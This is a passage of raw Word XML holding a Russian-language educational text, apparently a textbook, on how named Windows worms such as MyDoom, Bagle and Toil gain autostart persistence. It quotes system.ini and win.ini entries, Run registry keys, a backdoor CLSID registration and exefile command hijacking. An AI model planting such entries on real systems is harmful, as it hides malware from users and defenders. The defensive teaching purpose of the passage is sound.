          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ствия:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Создают исполняемый файл с расширением .exe с произвольным именем или именем очень похожим на имя системных файлов Windows. В н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>которых червях могут использоваться технологии присущие вирусам, в таком случае черви инфицируют уже существующий файл приложения (например WSOCK32.DLL) или заменяют его на свой файл (например I-Worm.MTX зап</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>сывает одну из своих процедур в файл WSOCK32.DLL таким образом, что она перехватывает отсылку данных в Интернет (процедура send). В результате червь в зараженной библиотеке WSOCK32.DLL получал управление каждый раз, когда данные отправляются в Интернет).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Кроме этого, вместе с добавлением в систему исполняемых файлов, в ряде случаев черви помещают в систему файлы библиотек, которые обычно выполняют функции Backdoor компонентов (например один из клонов червя MyDoom - I-Worm.Mydoom.aa создавал системном каталоге Windows файл </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="1c"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>tcp5424.dll</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, являющийся Backdoor-компонентом и </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>регистрировал его в систе</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>м</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ном реестре: HKCR\CLSID\{E6FB5E20- DE35-11CF-9C87-00AA005127ED}\InProcServer32 {Default} = "%SysDir%\tcp5424.dll")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Вредоносная программа может вносить изменения в системные файлы </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="1c"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">win.ini </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">и </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="1c"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>system.ini</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Например, Email- Worm.Win32.Toil при установке в заражаемой системе копирует себя в папку Windows со случайным именем и записывает в файл </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="1c"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">system.ini </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>следующие значения:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="ad"/>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[boot]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="ad"/>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>shell=Explorer.exe %</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>имя</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>червя</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="ad"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>что обеспечивает ему автозапуск при каждой перезагрузке Windows (но только под Win9x/Me).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="ad"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Email-Worm.Win32.Atak.h в процессе инсталляции копирует себя с им</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">нем </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="1c"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">dec25.exe </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">в системный каталог Windows и модифицирует файл </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="1c"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">win.ini </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">для своего последующего запуска - добавляет полный путь к файлу </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="1c"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">dec25.exe </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">в ключ </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="1c"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">run </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>секции [windows]:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="ad"/>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[windows]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="ad"/>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>run=%SystemDir%\dec25. exe)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="ad"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Следует так же отметить, что в файле </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="1c"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">system.ini </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>кроме секции [boot] вр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>доносные программы могут использовать секцию [Drivers].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Вредоносные программы могут вносить изменения в следующие ветки реестра:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="36"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>ключи</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Run,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="36"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">RunOnce, RunOnceEx, RunServices, RunServicesOnce - </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>для</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>того</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>чтобы</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>стема</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>запускала</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>созданные</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>червем</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>файлы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="36"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>ключ</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Run.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="ad"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Например, Email-Worm.Win32.Bagle.ax после запуска копирует себя в с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>стемный каталог Windows, после чего регистрирует в реестре скопированный файл:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="ad"/>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>HKEY_CURRENT_USER\Software\Microsof\Windows\CurrentVersion\Run</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="ad"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>"Sysformat"="%System%\sysformat.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> HKEY_CLASSES_ROOT\exefile\shell\open\command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="ad"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Например</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>вирус</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> I-Worm.Navidad. </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>вносил</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>следующие</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>изменения</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>: HKEY_CLASSES_ROOT\exefile\shell\open\command {Default} =</w:t>
      </w:r>
    </w:p>
